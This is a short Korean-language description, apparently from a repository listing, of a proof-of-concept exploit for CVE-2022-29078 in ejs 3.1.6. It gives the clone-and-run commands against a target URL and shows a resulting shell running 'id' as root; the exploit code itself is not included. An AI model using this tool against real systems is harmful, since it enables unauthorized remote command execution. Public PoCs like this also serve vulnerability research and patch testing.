
CVE-2022-29078(ejs 3.1.6)에 대한 개념 증명 익스플로잇으로, Python 스크립트를 통해 원격 명령 실행을 가능하게 합니다. 대상 URL을 입력받아 대화형 셸을 제공합니다.
CVE-2022-29078용 간단한 PoC (취약한 ejs 3.1.6)
git clone https://github.com/chuckdu21/CVE-2022-29078.git
cd CVE-2022-29078
python3 CVE-2022-29078.py <URL>
명령어를 실행할 수 있는 프롬프트가 표시됩니다
$ id
uid=0(root) gid=0(root) groupes=0(root)